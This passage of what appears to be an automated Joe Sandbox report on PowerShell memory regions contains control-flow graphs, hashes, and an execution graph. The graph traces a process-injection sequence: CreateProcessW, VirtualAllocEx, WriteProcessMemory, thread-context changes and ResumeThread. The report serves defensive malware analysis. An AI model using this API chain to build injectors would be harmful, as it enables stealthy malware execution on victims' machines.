                                                                                                                    • Instruction ID: 9307d875d00d61539a7c5390c6c8007c55c350409a66cda8be7b9a5e74fe6b74
                                                                                                                    • Opcode Fuzzy Hash: 829be7aeac15ecbca4460782524b764259084677b483409af401796d5fdecce6
                                                                                                                    • Instruction Fuzzy Hash: 012106B1D01219DFDF00DF99D884AEEFBB4FB48310F20811AE918A7310D374AA50CBA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 257 72f45f7-72f463b 259 72f4af2-72f4b25 257->259 260 72f4641-72f4646 257->260 268 72f4b27-72f4b33 259->268 269 72f4b35 259->269 261 72f465e-72f4663 260->261 262 72f4648-72f464e 260->262 264 72f4665-72f4671 261->264 265 72f4673 261->265 266 72f4652-72f465c 262->266 267 72f4650 262->267 270 72f4675-72f4677 264->270 265->270 266->261 267->261 272 72f4b37-72f4b39 268->272 269->272 273 72f467d-72f4687 270->273 274 72f4a93-72f4a9d 270->274 277 72f4b7b-72f4b85 272->277 278 72f4b3b-72f4b42 272->278 273->259 279 72f468d-72f4692 273->279 275 72f4a9f-72f4aa8 274->275 276 72f4aab-72f4ab1 274->276 280 72f4ab7-72f4ac3 276->280 281 72f4ab3-72f4ab5 276->281 285 72f4b8e-72f4b94 277->285 286 72f4b87-72f4b8b 277->286 278->277 282 72f4b44-72f4b61 278->282 283 72f46aa-72f46b8 279->283 284 72f4694-72f469a 279->284 287 72f4ac5-72f4aef 280->287 281->287 297 72f4bc9-72f4bce 282->297 298 72f4b63-72f4b75 282->298 283->274 301 72f46be-72f46dd 283->301 288 72f469e-72f46a8 284->288 289 72f469c 284->289 290 72f4b9a-72f4ba6 285->290 291 72f4b96-72f4b98 285->291 288->283 289->283 295 72f4ba8-72f4bc6 290->295 291->295 297->298 298->277 301->274 308 72f46e3-72f46ed 301->308 308->259 309 72f46f3-72f46f8 308->309 310 72f46fa-72f4700 309->310 311 72f4710-72f4714 309->311 312 72f4704-72f470e 310->312 313 72f4702 310->313 311->274 314 72f471a-72f471e 311->314 312->311 313->311 314->274 315 72f4724-72f4728 314->315 315->274 317 72f472e-72f473e 315->317 318 72f47c6-72f4815 317->318 319 72f4744-72f476b 317->319 336 72f481c-72f482f 318->336 324 72f476d-72f4773 319->324 325 72f4785-72f47b3 319->325 326 72f4777-72f4783 324->326 327 72f4775 324->327 334 72f47b5-72f47b7 325->334 335 72f47c1-72f47c4 325->335 326->325 327->325 334->335 335->336 337 72f48b7-72f4906 336->337 338 72f4835-72f485c 336->338 355 72f490d-72f4920 337->355 343 72f485e-72f4864 338->343 344 72f4876-72f48a4 338->344 345 72f4868-72f4874 343->345 346 72f4866 343->346 353 72f48a6-72f48a8 344->353 354 72f48b2-72f48b5 344->354 345->344 346->344 353->354 354->355 356 72f49a8-72f49f7 355->356 357 72f4926-72f494d 355->357 374 72f49fe-72f4a2c 356->374 362 72f494f-72f4955 357->362 363 72f4967-72f4995 357->363 364 72f4959-72f4965 362->364 365 72f4957 362->365 372 72f4997-72f4999 363->372 373 72f49a3-72f49a6 363->373 364->363 365->363 372->373 373->374 379 72f4a2f call 4487a08 374->379 380 72f4a2f call 4487a18 374->380 381 72f4a2f call 4481bf8 374->381 382 72f4a2f call 4487c45 374->382 377 72f4a34-72f4a90 379->377 380->377 381->377 382->377
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.2163865134.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_72f0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: tP]q
                                                                                                                    • API String ID: 0-2175968468
                                                                                                                    • Opcode ID: 4933ac6aa6b77e114de573d88f179dfe95480b2f6018cb783816b2f8bd304026
                                                                                                                    • Instruction ID: 94a3768c8057e9af809190635d8af52280b698e8ac19fc546ae3d60200c0ed42
                                                                                                                    • Opcode Fuzzy Hash: 4933ac6aa6b77e114de573d88f179dfe95480b2f6018cb783816b2f8bd304026
                                                                                                                    • Instruction Fuzzy Hash: 4991E4B0B202469FDB14DF18C590B6AFBF2FB88710F258569EA059B350DBB1ED41CB90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 666 72f1ff5-72f1ff9 667 72f1ffb-72f2000 666->667 668 72f2011-72f2020 666->668 669 72f2077-72f2079 667->669 670 72f2001 667->670 682 72f2108-72f2112 668->682 683 72f2026-72f2044 668->683 673 72f207f 669->673 674 72f207a-72f207c 669->674 671 72f2005-72f2009 670->671 672 72f2002-72f2003 670->672 676 72f200a-72f200d 671->676 677 72f1ff3 671->677 672->668 680 72f2091-72f2099 673->680 681 72f2081-72f208d 673->681 678 72f207e 674->678 679 72f20c2-72f20f5 674->679 676->674 694 72f200f 676->694 677->666 678->673 705 72f20fc-72f2105 679->705 692 72f209b-72f20a1 680->692 693 72f20b3-72f20b7 680->693 681->680 684 72f2114-72f211d 682->684 685 72f2120-72f2126 682->685 683->682 702 72f204a-72f206f 683->702 689 72f212c-72f2138 685->689 690 72f2128-72f212a 685->690 695 72f213a-72f2155 689->695 690->695 696 72f20a5-72f20b1 692->696 697 72f20a3 692->697 703 72f20be-72f20c0 693->703 694->668 696->693 697->693 702->682 712 72f2075 702->712 703->705 712->669
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.2163865134.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_72f0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fd1a7a9fafa5310b35456c463eb5cf25a3135067155222e4df695a06ec2d03c6
                                                                                                                    • Instruction ID: b9c2168bca685d63a7aba32be14fad099873ea9733cfbd2c177f1be6ae9bd048
                                                                                                                    • Opcode Fuzzy Hash: fd1a7a9fafa5310b35456c463eb5cf25a3135067155222e4df695a06ec2d03c6
                                                                                                                    • Instruction Fuzzy Hash: E6415CF2B50215CBCB25D76888106AEFBD1EFE2714B1484BED6019F346CE21D906C7A2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.2159037503.0000000002A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A1D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_2a1d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 11c2c37961e31be64c3b5bde411fd4cf4aa2151d2128f4617018266f919ed8e4
                                                                                                                    • Instruction ID: 3db546e6544b8ef1c80583788a6038dc8ae69ae831c844a55c0f252e85ec78c2
                                                                                                                    • Opcode Fuzzy Hash: 11c2c37961e31be64c3b5bde411fd4cf4aa2151d2128f4617018266f919ed8e4
                                                                                                                    • Instruction Fuzzy Hash: AD01F731404B40DAD7208B19C9C4B67BF98EF46334F18C429ED4A0B246CB799841CAB1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.2159037503.0000000002A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A1D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_2a1d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3666bb5cd94f3f0421154bf2ae09a3ef353063534dd48c4ec279e733513cc8c0
                                                                                                                    • Instruction ID: bcc0c56171bd0efb6199fbc0bd3fd70b64c750e45e8f5740d5d301b3707600d1
                                                                                                                    • Opcode Fuzzy Hash: 3666bb5cd94f3f0421154bf2ae09a3ef353063534dd48c4ec279e733513cc8c0
                                                                                                                    • Instruction Fuzzy Hash: 2A01407140E7D09ED7128B259994B52BFB4EF43224F1980DBD9888F193C2695844C772
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.2163865134.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_72f0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-858218434
                                                                                                                    • Opcode ID: b5f9320fe2814a743436c6f582ac37ce83f2b9f55461b87a94ab452e11c728aa
                                                                                                                    • Instruction ID: e604f07024e2d1659d990c8597df2ce485529fb3ef069247cd8932fd592b3bab
                                                                                                                    • Opcode Fuzzy Hash: b5f9320fe2814a743436c6f582ac37ce83f2b9f55461b87a94ab452e11c728aa
                                                                                                                    • Instruction Fuzzy Hash: FD2137F17303165BDB38D56A9840B26FBDA9BC8B15F64843A9A05CB383CD72C8418765
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.2163865134.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_72f0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4']q$4']q$$]q$$]q
                                                                                                                    • API String ID: 0-978391646
                                                                                                                    • Opcode ID: 650971b1dc1aeb7c9816ea9a1f98e83dfde88d3ee58f525a4893e1e2eae79fbf
                                                                                                                    • Instruction ID: 60f2b16420678987514a4665be90d305f03251ff39b2e51e83a93820057a9c55
                                                                                                                    • Opcode Fuzzy Hash: 650971b1dc1aeb7c9816ea9a1f98e83dfde88d3ee58f525a4893e1e2eae79fbf
                                                                                                                    • Instruction Fuzzy Hash: D601A26171D3C64FC73B1628183016AAFB69F83560B2A45EBC181DF2A7CD594D05C3A7

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:10.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:42.6%
                                                                                                                    Total number of Nodes:61
                                                                                                                    Total number of Limit Nodes:18
                                                                                                                    execution_graph 10199 4ce81c7 10200 4ce819e 10199->10200 10201 4ce8284 10200->10201 10204 4ceb890 10200->10204 10202 4ce8312 10205 4ceb8b6 10204->10205 10206 4ceb8af 10204->10206 10205->10206 10209 4cebd8e 10205->10209 10231 4ceb890 8 API calls 10205->10231 10232 4cebdf0 10205->10232 10206->10202 10207 4cebd9c 10207->10202 10208 4cecb25 CreateProcessW 10211 4cecb99 10208->10211 10209->10207 10215 4cec6e3 10209->10215 10255 4ce75c4 10209->10255 10212 4cebf79 10213 4ce75d0 Wow64SetThreadContext 10212->10213 10212->10215 10214 4cec05a 10213->10214 10214->10215 10216 4cec1fc VirtualAllocEx 10214->10216 10224 4cec6fe 10214->10224 10215->10208 10215->10224 10217 4cec245 10216->10217 10217->10215 10219 4cec2f2 VirtualAllocEx 10217->10219 10220 4cec339 10217->10220 10218 4ce75e8 WriteProcessMemory 10221 4cec383 10218->10221 10219->10220 10220->10215 10220->10218 10220->10224 10221->10215 10222 4cec58f 10221->10222 10221->10224 10228 4ce75e8 WriteProcessMemory 10221->10228 10222->10215 10223 4ce75e8 WriteProcessMemory 10222->10223 10225 4cec5d7 10223->10225 10224->10202 10225->10215 10225->10224 10226 4ce75f4 Wow64SetThreadContext 10225->10226 10227 4cec68e 10226->10227 10227->10215 10227->10224 10229 4cec6a3 ResumeThread 10227->10229 10228->10221 10229->10215 10231->10205 10234 4cebe72 10232->10234 10233 4cecb25 CreateProcessW 10236 4cecb99 10233->10236 10235 4ce75c4 CreateProcessW 10234->10235 10240 4cec6e3 10234->10240 10237 4cebf79 10235->10237 10237->10240 10259 4ce75d0 10237->10259 10239 4cec05a 10239->10240 10241 4cec1fc VirtualAllocEx 10239->10241 10249 4cec6fe 10239->10249 10240->10233 10240->10249 10242 4cec245 10241->10242 10242->10240 10244 4cec2f2 VirtualAllocEx 10242->10244 10245 4cec339 10242->10245 10244->10245 10245->10240 10245->10249 10263 4ce75e8 10245->10263 10246 4cec383 10246->10240 10247 4cec58f 10246->10247 10246->10249 10253 4ce75e8 WriteProcessMemory 10246->10253 10247->10240 10248 4ce75e8 WriteProcessMemory 10247->10248 10250 4cec5d7 10248->10250 10249->10205 10250->10240 10250->10249 10267 4ce75f4 10250->10267 10253->10246 10254 4cec6a3 ResumeThread 10254->10240 10256 4ceca40 CreateProcessW 10255->10256 10258 4cecb99 10256->10258 10260 4cecc80 Wow64SetThreadContext 10259->10260 10262 4ceccfa 10260->10262 10262->10239 10264 4ced1f8 WriteProcessMemory 10263->10264 10266 4ced283 10264->10266 10266->10246 10268 4cecc80 Wow64SetThreadContext 10267->10268 10270 4cec68e 10268->10270 10270->10240 10270->10249 10270->10254
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2408878133.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_4ce0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Xaq$$]q
                                                                                                                    • API String ID: 0-1280934391
                                                                                                                    • Opcode ID: 1a9d07f2e99b1ae922c3d5831613410a77b5e7d8b491445ea6c94c259cd9c4c1
                                                                                                                    • Instruction ID: d816c771996d16433b4cecf8acea2505c009e944d81d91b045be43b350c1b9c7
                                                                                                                    • Opcode Fuzzy Hash: 1a9d07f2e99b1ae922c3d5831613410a77b5e7d8b491445ea6c94c259cd9c4c1
                                                                                                                    • Instruction Fuzzy Hash: E7826D75A00215CFDB24CF2AC9847BABBB3BF44314F148569E4599B255DB38FE82CB90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2408878133.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_4ce0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1bdfce1fe10b764685dd8a861800c14100d7860b67dc29f571739b931b5339f1
                                                                                                                    • Instruction ID: 3fbc26f5c6719c42dbb60df390bd42b27b09168ad7a271ff0691d063c06fd664
                                                                                                                    • Opcode Fuzzy Hash: 1bdfce1fe10b764685dd8a861800c14100d7860b67dc29f571739b931b5339f1
                                                                                                                    • Instruction Fuzzy Hash: 8B724E74A00218CFEB64EF69D4597AD7BBAEF88300F104069D90A9B3A5DF385D86CF51

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 7bd09c8-7bd09eb 1 7bd0bc6-7bd0c0e 0->1 2 7bd09f1-7bd09f6 0->2 10 7bd0d7b-7bd0dad 1->10 11 7bd0c14-7bd0c19 1->11 3 7bd0a0e-7bd0a12 2->3 4 7bd09f8-7bd09fe 2->4 8 7bd0a18-7bd0a1c 3->8 9 7bd0b73-7bd0b7d 3->9 6 7bd0a00 4->6 7 7bd0a02-7bd0a0c 4->7 6->3 7->3 12 7bd0a2f 8->12 13 7bd0a1e-7bd0a2d 8->13 14 7bd0b7f-7bd0b88 9->14 15 7bd0b8b-7bd0b91 9->15 32 7bd0dbd 10->32 33 7bd0daf-7bd0dbb 10->33 20 7bd0c1b-7bd0c21 11->20 21 7bd0c31-7bd0c35 11->21 16 7bd0a31-7bd0a33 12->16 13->16 17 7bd0b97-7bd0ba3 15->17 18 7bd0b93-7bd0b95 15->18 16->9 24 7bd0a39-7bd0a59 16->24 25 7bd0ba5-7bd0bc3 17->25 18->25 22 7bd0c25-7bd0c2f 20->22 23 7bd0c23 20->23 26 7bd0c3b-7bd0c3d 21->26 27 7bd0d2a-7bd0d34 21->27 22->21 23->21 57 7bd0a78 24->57 58 7bd0a5b-7bd0a76 24->58 29 7bd0c4d 26->29 30 7bd0c3f-7bd0c4b 26->30 34 7bd0d36-7bd0d3f 27->34 35 7bd0d42-7bd0d48 27->35 38 7bd0c4f-7bd0c51 29->38 30->38 40 7bd0dbf-7bd0dc1 32->40 33->40 41 7bd0d4e-7bd0d5a 35->41 42 7bd0d4a-7bd0d4c 35->42 38->27 43 7bd0c57-7bd0c59 38->43 44 7bd0e0d-7bd0e17 40->44 45 7bd0dc3-7bd0dc9 40->45 46 7bd0d5c-7bd0d78 41->46 42->46 51 7bd0c69 43->51 52 7bd0c5b-7bd0c67 43->52 48 7bd0e19-7bd0e1f 44->48 49 7bd0e22-7bd0e28 44->49 54 7bd0dcb-7bd0dcd 45->54 55 7bd0dd7-7bd0df4 45->55 59 7bd0e2e-7bd0e3a 49->59 60 7bd0e2a-7bd0e2c 49->60 61 7bd0c6b-7bd0c6d 51->61 52->61 54->55 72 7bd0e5a-7bd0e5f 55->72 73 7bd0df6-7bd0e07 55->73 62 7bd0a7a-7bd0a7c 57->62 58->62 63 7bd0e3c-7bd0e57 59->63 60->63 61->27 64 7bd0c73-7bd0c75 61->64 62->9 71 7bd0a82-7bd0a84 62->71 68 7bd0c8f-7bd0c93 64->68 69 7bd0c77-7bd0c7d 64->69 76 7bd0cad-7bd0d27 68->76 77 7bd0c95-7bd0c9b 68->77 74 7bd0c7f 69->74 75 7bd0c81-7bd0c8d 69->75 78 7bd0a94 71->78 79 7bd0a86-7bd0a92 71->79 72->73 73->44 74->68 75->68 84 7bd0c9d 77->84 85 7bd0c9f-7bd0cab 77->85 83 7bd0a96-7bd0a98 78->83 79->83 83->9 87 7bd0a9e-7bd0abe 83->87 84->76 85->76 95 7bd0ad6-7bd0ada 87->95 96 7bd0ac0-7bd0ac6 87->96 99 7bd0adc-7bd0ae2 95->99 100 7bd0af4-7bd0af8 95->100 97 7bd0ac8 96->97 98 7bd0aca-7bd0acc 96->98 97->95 98->95 101 7bd0ae4 99->101 102 7bd0ae6-7bd0af2 99->102 103 7bd0aff-7bd0b01 100->103 101->100 102->100 105 7bd0b19-7bd0b70 103->105 106 7bd0b03-7bd0b09 103->106 107 7bd0b0d-7bd0b0f 106->107 108 7bd0b0b 106->108 107->105 108->105
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2438871747.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_7bd0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-66262967
                                                                                                                    • Opcode ID: bdbdf253c017fb54c8a91bd44b20a13205941fabe886eb7aefef6119d7aa31be
                                                                                                                    • Instruction ID: 7d8018de1e680294e1a32644951b01d7fd74b95931c7770220538335a3dedfe0
                                                                                                                    • Opcode Fuzzy Hash: bdbdf253c017fb54c8a91bd44b20a13205941fabe886eb7aefef6119d7aa31be
                                                                                                                    • Instruction Fuzzy Hash: 14B148F17043069FEB24AE79985076ABBE6EFC5610F2484BBD845CB241FA31CC41C761

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 110 7bd13a0-7bd13c6 111 7bd13cc-7bd13d1 110->111 112 7bd1572-7bd15ba 110->112 113 7bd13e9-7bd13ed 111->113 114 7bd13d3-7bd13d9 111->114 120 7bd16ec-7bd171d 112->120 121 7bd15c0-7bd15c5 112->121 118 7bd151e-7bd1528 113->118 119 7bd13f3-7bd13f5 113->119 115 7bd13dd-7bd13e7 114->115 116 7bd13db 114->116 115->113 116->113 124 7bd152a-7bd1533 118->124 125 7bd1536-7bd153c 118->125 122 7bd1405 119->122 123 7bd13f7-7bd1403 119->123 141 7bd172d 120->141 142 7bd171f-7bd172b 120->142 127 7bd15dd-7bd15e1 121->127 128 7bd15c7-7bd15cd 121->128 129 7bd1407-7bd1409 122->129 123->129 130 7bd153e-7bd1540 125->130 131 7bd1542-7bd154e 125->131 134 7bd169e-7bd16a8 127->134 135 7bd15e7-7bd15e9 127->135 132 7bd15cf 128->132 133 7bd15d1-7bd15db 128->133 129->118 137 7bd140f-7bd1413 129->137 138 7bd1550-7bd156f 130->138 131->138 132->127 133->127 145 7bd16aa-7bd16b2 134->145 146 7bd16b5-7bd16bb 134->146 139 7bd15f9 135->139 140 7bd15eb-7bd15f7 135->140 143 7bd1415-7bd1424 137->143 144 7bd1426 137->144 150 7bd15fb-7bd15fd 139->150 140->150 151 7bd172f-7bd1731 141->151 142->151 152 7bd1428-7bd142a 143->152 144->152 153 7bd16bd-7bd16bf 146->153 154 7bd16c1-7bd16cd 146->154 150->134 155 7bd1603-7bd1605 150->155 157 7bd179f-7bd17a9 151->157 158 7bd1733-7bd1752 151->158 152->118 156 7bd1430-7bd1432 152->156 159 7bd16cf-7bd16e9 153->159 154->159 164 7bd161f-7bd162a 155->164 165 7bd1607-7bd160d 155->165 166 7bd1434-7bd1440 156->166 167 7bd1442 156->167 162 7bd17ab-7bd17af 157->162 163 7bd17b2-7bd17b8 157->163 190 7bd1754-7bd1760 158->190 191 7bd1762 158->191 170 7bd17be-7bd17ca 163->170 171 7bd17ba-7bd17bc 163->171 178 7bd162c-7bd1632 164->178 179 7bd1642-7bd169b 164->179 173 7bd160f 165->173 174 7bd1611-7bd161d 165->174 168 7bd1444-7bd1446 166->168 167->168 168->118 176 7bd144c-7bd144e 168->176 177 7bd17cc-7bd17ea 170->177 171->177 173->164 174->164 180 7bd1468-7bd1473 176->180 181 7bd1450-7bd1456 176->181 186 7bd1634 178->186 187 7bd1636-7bd1638 178->187 193 7bd1475-7bd1478 180->193 194 7bd1482-7bd148e 180->194 188 7bd1458 181->188 189 7bd145a-7bd1466 181->189 186->179 187->179 188->180 189->180 196 7bd1764-7bd1766 190->196 191->196 193->194 197 7bd149c-7bd14a3 194->197 198 7bd1490-7bd1492 194->198 196->157 199 7bd1768-7bd1785 196->199 202 7bd14aa-7bd14ac 197->202 198->197 209 7bd17ed-7bd17f2 199->209 210 7bd1787-7bd1799 199->210 203 7bd14ae-7bd14b4 202->203 204 7bd14c4-7bd151b 202->204 206 7bd14b8-7bd14ba 203->206 207 7bd14b6 203->207 206->204 207->204 209->210 210->157
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2438871747.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_7bd0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-267665775
                                                                                                                    • Opcode ID: 30c547864d639236d9b088da3f2333c51bc3a67d94a7c4a6dd426b5023a9f871
                                                                                                                    • Instruction ID: 2eec03dd614501275984c7b6399c94ce372c8cba940128810e206f3118cc5df8
                                                                                                                    • Opcode Fuzzy Hash: 30c547864d639236d9b088da3f2333c51bc3a67d94a7c4a6dd426b5023a9f871
                                                                                                                    • Instruction Fuzzy Hash: 53B146F570030ECFEB258E6D884067ABBE6EF81211F1A84EAD845CB251FA35CC41CB61

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 603 7bd1f18-7bd1f3a 604 7bd20b7-7bd2102 603->604 605 7bd1f40-7bd1f45 603->605 611 7bd225d-7bd22a2 604->611 612 7bd2108-7bd210d 604->612 606 7bd1f5d-7bd1f69 605->606 607 7bd1f47-7bd1f4d 605->607 617 7bd1f6f-7bd1f72 606->617 618 7bd2062-7bd206c 606->618 608 7bd1f4f 607->608 609 7bd1f51-7bd1f5b 607->609 608->606 609->606 627 7bd244c-7bd246c 611->627 628 7bd22a8-7bd22ad 611->628 615 7bd210f-7bd2115 612->615 616 7bd2125-7bd2129 612->616 620 7bd2119-7bd2123 615->620 621 7bd2117 615->621 625 7bd212f-7bd2133 616->625 626 7bd2208-7bd2212 616->626 617->618 624 7bd1f78-7bd1f7f 617->624 622 7bd206e-7bd2077 618->622 623 7bd207a-7bd2080 618->623 620->616 621->616 631 7bd2086-7bd2092 623->631 632 7bd2082-7bd2084 623->632 624->604 633 7bd1f85-7bd1f8a 624->633 634 7bd2135-7bd2146 625->634 635 7bd2173 625->635 629 7bd2214-7bd221d 626->629 630 7bd2220-7bd2226 626->630 666 7bd246e-7bd247c 627->666 667 7bd24c7 627->667 636 7bd22af-7bd22b5 628->636 637 7bd22c5-7bd22c9 628->637 638 7bd222c-7bd2238 630->638 639 7bd2228-7bd222a 630->639 642 7bd2094-7bd20b4 631->642 632->642 643 7bd1f8c-7bd1f92 633->643 644 7bd1fa2-7bd1fa6 633->644 634->611 657 7bd214c-7bd2151 634->657 640 7bd2175-7bd2177 635->640 649 7bd22b9-7bd22c3 636->649 650 7bd22b7 636->650 653 7bd22cf-7bd22d3 637->653 654 7bd23f4-7bd23fe 637->654 652 7bd223a-7bd225a 638->652 639->652 640->626 655 7bd217d-7bd2181 640->655 645 7bd1f94 643->645 646 7bd1f96-7bd1fa0 643->646 644->618 648 7bd1fac-7bd1fb0 644->648 645->644 646->644 664 7bd1fd0 648->664 665 7bd1fb2-7bd1fce 648->665 649->637 650->637 658 7bd22d5-7bd22e6 653->658 659 7bd2313 653->659 660 7bd240c-7bd2412 654->660 661 7bd2400-7bd2409 654->661 655->626 662 7bd2187-7bd2196 655->662 669 7bd2169-7bd2171 657->669 670 7bd2153-7bd2159 657->670 658->627 695 7bd22ec-7bd22f1 658->695 676 7bd2315-7bd2317 659->676 673 7bd2418-7bd2424 660->673 674 7bd2414-7bd2416 660->674 696 7bd21ae-7bd2205 662->696 697 7bd2198-7bd219e 662->697 679 7bd1fd2-7bd1fd4 664->679 665->679 677 7bd247e-7bd249b 666->677 678 7bd24b5-7bd24bf 666->678 671 7bd24c8-7bd24ce 667->671 669->640 682 7bd215d-7bd2167 670->682 683 7bd215b 670->683 684 7bd24d4-7bd24e0 671->684 685 7bd24d0-7bd24d2 671->685 688 7bd2426-7bd2449 673->688 674->688 676->654 690 7bd231d-7bd2321 676->690 711 7bd249d-7bd24af 677->711 712 7bd2505-7bd250a 677->712 678->671 681 7bd24c1-7bd24c5 678->681 679->618 692 7bd1fda-7bd1fe7 679->692 682->669 683->669 694 7bd24e2-7bd2502 684->694 685->694 690->654 699 7bd2327-7bd232b 690->699 717 7bd1fee-7bd1ff0 692->717 703 7bd2309-7bd2311 695->703 704 7bd22f3-7bd22f9 695->704 705 7bd21a0 697->705 706 7bd21a2-7bd21a4 697->706 699->654 709 7bd2331-7bd2357 699->709 703->676 715 7bd22fd-7bd2307 704->715 716 7bd22fb 704->716 705->696 706->696 709->654 729 7bd235d-7bd2361 709->729 711->678 712->711 715->703 716->703 721 7bd2008-7bd205f 717->721 722 7bd1ff2-7bd1ff8 717->722 725 7bd1ffc-7bd1ffe 722->725 726 7bd1ffa 722->726 725->721 726->721 730 7bd2384 729->730 731 7bd2363-7bd236c 729->731 734 7bd2387-7bd2394 730->734 732 7bd236e-7bd2371 731->732 733 7bd2373-7bd2380 731->733 735 7bd2382 732->735 733->735 737 7bd239a-7bd23f1 734->737 735->734
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2438871747.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_7bd0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (o]q$(o]q$4']q$4']q$4']q$4']q
                                                                                                                    • API String ID: 0-3265970930
                                                                                                                    • Opcode ID: 7fe380fb497eb8c88e0695c493ab461e0b473875d6a8a28549629d569381272c
                                                                                                                    • Instruction ID: 05d821fd64b1bcfb1f930081966fca76d46b603ff6d2dca097f01f35d5fa7a92
                                                                                                                    • Opcode Fuzzy Hash: 7fe380fb497eb8c88e0695c493ab461e0b473875d6a8a28549629d569381272c
                                                                                                                    • Instruction Fuzzy Hash: E6F129B1704389DFEB148F69D8147EABBA2FF85310F14C4AAE5558B251EB31CC45CBA1
                                                                                                                    APIs
                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,00000000,?,?), ref: 04CEC22C
                                                                                                                    • VirtualAllocEx.KERNEL32(?,?,00000000,?,?), ref: 04CEC320
                                                                                                                      • Part of subcall function 04CE75E8: WriteProcessMemory.KERNELBASE(?,00000000,00000000,1ADC789D,00000000,?,?,?,19D27798,00000000,?,04CEC383,?,00000000,?), ref: 04CED274
                                                                                                                    • ResumeThread.KERNELBASE(?), ref: 04CEC6CA
                                                                                                                    • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04CECB84
                                                                                                                    Memory Dump Source
